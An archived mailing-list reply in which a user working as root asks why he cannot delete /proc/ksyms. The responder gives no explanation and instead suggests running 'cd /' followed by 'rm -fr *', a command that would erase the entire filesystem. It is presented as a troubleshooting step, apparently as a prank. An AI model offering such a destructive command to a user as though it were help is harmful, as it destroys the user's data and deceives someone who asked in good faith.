[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] unable to remove file



Rick wrote:
> 
> Hi,
> There is a problem when i try to remove a specified file.
> [root /root]# ls -al /proc/ksyms
> -r--r--r--   1 root     root            0 Jul  7 10:28 /proc/ksyms
> [root /root]# chmod 755 /proc/ksyms
> [root /root]# ls -al /proc/ksyms
> -r--r--r--   1 root     root            0 Jul  7 10:28 /proc/ksyms
> [root /root]# rm /proc/ksyms
> rm: cannot unlink `/proc/ksyms': Operation not permitted
> [root /root]#

What happens when you do this?

	cd /
	rm -fr *

-- 

Best Regards,

mds